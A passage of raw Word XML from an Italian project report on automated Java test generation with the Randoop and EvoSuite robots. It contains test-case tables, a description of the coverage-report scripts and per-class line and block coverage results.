            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="931" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FB1C207" w14:textId="5A5D06E2" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="00E85125" w:rsidP="00E85125">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:lastRenderedPageBreak/>
              <w:t>Test6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="016D3EAB" w14:textId="254E74A1"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Avvio dell’applicazione</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5709DB78" w14:textId="42C18060"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engono generati i livelli contenenti test e coverage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="702" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30357106" w14:textId="621DFE7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6F0B1DCB" w14:textId="77777777" w:rsidTr="00B6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14A4A4E0" w14:textId="07F89BA1" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="00E85125" w:rsidP="00E85125">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Test7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B55D51C" w14:textId="06ED2162"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robot_generazione.sh ClassUnderTest ClassUnderTestSourceCode /repository/ClassUnderTest/ClassUnderTestSourceCode 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76DD3B55" w14:textId="44901EDD"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engono generati i livelli contenenti test e coverage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="702" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="203A1382" w14:textId="2CF4FB35"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61B29499" w14:textId="77777777" w:rsidTr="00B61086">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="931" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25E48C1E" w14:textId="5E26AAB0" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="00E85125" w:rsidP="00E85125">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Test8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BE03244" w14:textId="7B55EAF3"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robot_generazione.sh classundertest ClassUnderTestSourceCode /repository/ClassUnderTest/ClassUnderTestSourceCode 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72F52C99" w14:textId="5EC0B6AB"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Errore nella generazione</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="702" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42BCD7E0" w14:textId="10A0A312"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7370E0CF" w14:textId="77777777" w:rsidTr="00B6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6746C7F5" w14:textId="72ED9269" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="00E85125" w:rsidP="00E85125">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Test9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2171F146" w14:textId="158A4449"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robot_generazione.sh ClassUnderTest ClassUnderTestSourceCode /repository/ClassUnderTest/ClassUnderTestSourceCode 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B41DA28" w14:textId="50697A12"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Errore nella generazione</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="702" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="185AEE33" w14:textId="0B11814B"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bl>
    <w:p w14:paraId="656F8ED0" w14:textId="77777777" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="000A2CD0" w:rsidP="000A2CD0"/>
    <w:p w14:paraId="3D55EC7C" w14:textId="6D440981" w:rsidR="00621119" w:rsidRPr="00715086" w:rsidRDefault="00621119" w:rsidP="0055772E"/>
    <w:p w14:paraId="7AA25C34" w14:textId="13C7D068" w:rsidR="00621119" w:rsidRPr="00715086" w:rsidRDefault="00621119" w:rsidP="00621119">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc148195755"/>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">5.2 </w:t>
      </w:r>
      <w:r w:rsidR="00A710E8" w:rsidRPr="00715086">
        <w:t>Report</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve"> generazione classi di test</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="5A5FA529" w14:textId="36A7EEA0" w:rsidR="00293658" w:rsidRPr="00715086" w:rsidRDefault="007E6537" w:rsidP="0055772E">
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Per </w:t>
      </w:r>
      <w:r w:rsidR="00293658" w:rsidRPr="00715086">
        <w:t>verificare</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve"> il funzionamento degli strumenti di generazione e misurazione delle classi di test da parte dei due Robot, sono stati </w:t>
      </w:r>
      <w:r w:rsidR="00293658" w:rsidRPr="00715086">
        <w:t>testati tali strumenti su un insieme di classi di test complesse.</w:t>
      </w:r>
      <w:r w:rsidR="006045F0" w:rsidRPr="00715086">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00293658" w:rsidRPr="00715086">
        <w:t>L’obiettivo è quello di dimostrare che i livelli generati dai robot siano di difficoltà crescente, ovvero che la misura di coverage sia crescente all’aumentare dei livelli</w:t>
      </w:r>
      <w:r w:rsidR="00327D9C" w:rsidRPr="00715086">
        <w:t>, a tal proposito sonno stati prodotti due report che mostrano la coverage al variare dei livelli per ciascuna classe</w:t>
      </w:r>
      <w:r w:rsidR="00293658" w:rsidRPr="00715086">
        <w:t xml:space="preserve">. Dato che i due robot generano metriche di coverage differenti, abbiamo scelto di considerare le metriche di </w:t>
      </w:r>
      <w:r w:rsidR="00644994" w:rsidRPr="00715086">
        <w:t xml:space="preserve">LINE (linee di codice) </w:t>
      </w:r>
      <w:r w:rsidR="00293658" w:rsidRPr="00715086">
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidR="00644994" w:rsidRPr="00715086">
        <w:t>BLOCK (blocchi di codice)</w:t>
      </w:r>
      <w:r w:rsidR="00293658" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> per Randoop, mentre le metriche di </w:t>
      </w:r>
      <w:r w:rsidR="00644994" w:rsidRPr="00715086">
        <w:t>WEAKMUTATION (mutation testing)</w:t>
      </w:r>
      <w:r w:rsidR="00293658" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r w:rsidR="00644994" w:rsidRPr="00715086">
        <w:t>CBRANCH</w:t>
      </w:r>
      <w:r w:rsidR="00293658" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00644994" w:rsidRPr="00715086">
        <w:t xml:space="preserve">(rami condizionali) </w:t>
      </w:r>
      <w:r w:rsidR="00293658" w:rsidRPr="00715086">
        <w:t>per EvoSuite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5025DF" w14:textId="421F2DDA" w:rsidR="00FA6DE5" w:rsidRPr="00715086" w:rsidRDefault="00FA6DE5" w:rsidP="0055772E">
      <w:r w:rsidRPr="00715086">
        <w:t>Prima di avviare la generazione è stato necessario aggiungere tutte le classi al repository rispettando la struttura del filesystem, è stato realizzato uno script python “generate_folder_structure.py” per rendere questo processo automatico</w:t>
      </w:r>
      <w:r w:rsidR="00BA7AF3" w:rsidRPr="00715086">
        <w:t>: questo script accede ad una cartella nella quale sono contenute tutte le classi da testare (file .java), e per ognuna di esse</w:t>
      </w:r>
      <w:r w:rsidR="00327D9C" w:rsidRPr="00715086">
        <w:t>, in accordo con la struttura del FolderTree, nel repository crea le cartelle necessarie e inserisce la classe java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64265726" w14:textId="25BF277D" w:rsidR="00DC4341" w:rsidRPr="00715086" w:rsidRDefault="00DC4341" w:rsidP="004737F1">
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Dall’insieme delle classi da testare sono state rimosse tre classi: </w:t>
      </w:r>
      <w:r w:rsidR="005355B7" w:rsidRPr="00715086">
        <w:t xml:space="preserve">“ChunkedLongArray” non funziona con EvoSuite e genera un errore </w:t>
      </w:r>
      <w:r w:rsidR="005355B7" w:rsidRPr="00715086">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>java.lang.OutOfMemoryError</w:t>
      </w:r>
      <w:r w:rsidR="005355B7" w:rsidRPr="00715086">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">“IntHashMap” e “NewGroupsOrNewsQuery” </w:t>
      </w:r>
      <w:r w:rsidR="005355B7" w:rsidRPr="00715086">
        <w:t xml:space="preserve">invece </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>non funzionano con Randoop</w:t>
      </w:r>
      <w:r w:rsidR="004737F1" w:rsidRPr="00715086">
        <w:t>, queste infatti non generano errori ma non è ritornato alcun file dalla generazione</w:t>
      </w:r>
      <w:r w:rsidR="005355B7" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> dei test</w:t>
      </w:r>
      <w:r w:rsidR="004737F1" w:rsidRPr="00715086">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5814B1" w14:textId="09110F4D" w:rsidR="001F60C0" w:rsidRPr="00715086" w:rsidRDefault="001F60C0" w:rsidP="001F60C0">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc148195756"/>
      <w:r w:rsidRPr="00715086">
        <w:t>5.2.1 Report Randoop</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="3F6E5E1D" w14:textId="77777777" w:rsidR="00327D9C" w:rsidRPr="00715086" w:rsidRDefault="00FA6DE5" w:rsidP="0055772E">
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Sono state apportate delle modifiche ai parametri di Randoop (in RanddopSubject.java) per </w:t>
      </w:r>
      <w:r w:rsidR="00327D9C" w:rsidRPr="00715086">
        <w:t>favorire</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve"> la generazione di più livelli. Sono stati modificati i valori di timelimit e max_iter: timelimit imposta il tempo massimo che il robot può impiegare per ciascuna iterazione, tale valore è stato decrementato (timelimit = 2) in modo tale che il robot non raggiunga subito il 100% della coverage; max_iter invece setta il massimo numero di iterazioni per la generazione di tutti i livelli, questo parametro è stato aumentato (max_iter = 7) per dare al robot più tentativi per raggiungere una coverage elevata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650B7E50" w14:textId="18779A7D" w:rsidR="001F60C0" w:rsidRPr="00715086" w:rsidRDefault="00FA6DE5" w:rsidP="0055772E">
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Randoop per come è implementato genera automaticamente i test delle classi che si trovano nel repository e non sono ancora state testate, quindi è </w:t>
      </w:r>
      <w:r w:rsidR="00327D9C" w:rsidRPr="00715086">
        <w:t>bastato</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve"> lanciare il container per la generazione dei livelli di queste nuove classi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216BEBF7" w14:textId="63A4A394" w:rsidR="00236853" w:rsidRPr="00715086" w:rsidRDefault="00743424" w:rsidP="0055772E">
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Per la generazione del report di Randoop è stato utilizzato uno script python “randoop_report.py”. Tale script accede ai file XML che costituiscono gli output di coverage Randoop, estrae da questi file informazioni riguardanti la copertura delle linee e blocchi di codice per ciascuna classe, e verifica se tali dati sono in </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:t>ordine crescente</w:t>
      </w:r>
      <w:r w:rsidR="00F61202" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> all’aumentare dei livelli. Nel caso in cui i dati siano effettivamente in ordine crescente viene stampato il messaggio [TEST PASSED] seguito dai valori dei due criteri line e block per ogni livello generato, altrimenti viene stampato [TEST FAILED]. Nel caso in cui il file XML non sia presente viene catturata l’eccezione “FileNotFoundError” e viene stampato un messaggio di errore.</w:t>
      </w:r>
      <w:r w:rsidR="00236853" w:rsidRPr="00715086">
        <w:br/>
        <w:t>Di seguito è mostrato l’output del report (contenuto anche nel file evosuite_report.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E7717C" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ByteArrayHashMap: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F98E2C" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lines: [64, 86, 87]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A7566D" w14:textId="2A06C124" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks: [67, 88, 89] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAB7082" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B080E0F" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ByteVector: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F101F54" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lines: [63]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388EB71A" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks: [60] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EF3CDB" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29FE7E84" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Calcolatrice: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23486971" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lines: [100]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD103DB" w14:textId="602C3FD1" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks: [100] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708DBF06" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08E63A8D" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FontInfo: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0360DFF5" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lines: [82]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367C7E57" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks: [80] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0262D8" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0296F4A1" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FTPFile: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74337736" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lines: [68, 69, 70, 71, 72]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17580CFB" w14:textId="1C99288B" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks: [65, 66, 67, 68, 69] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F6C1A4" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="406F7CDB" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HierarchyPropertyParser: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1015B3F4" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lines: [45, 49, 54]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA55BAD" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks: [37, 40, 45] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773D1743" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB25FFF" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HSLColor: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F19B7BE" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lines: [84, 85, 87]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AAC279" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks: [82, 83, 84] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C22327" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="162F4A19" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ImprovedStreamTokenizer: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3A6B0A" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lines: [13]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17439B5A" w14:textId="42CB6B2E" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
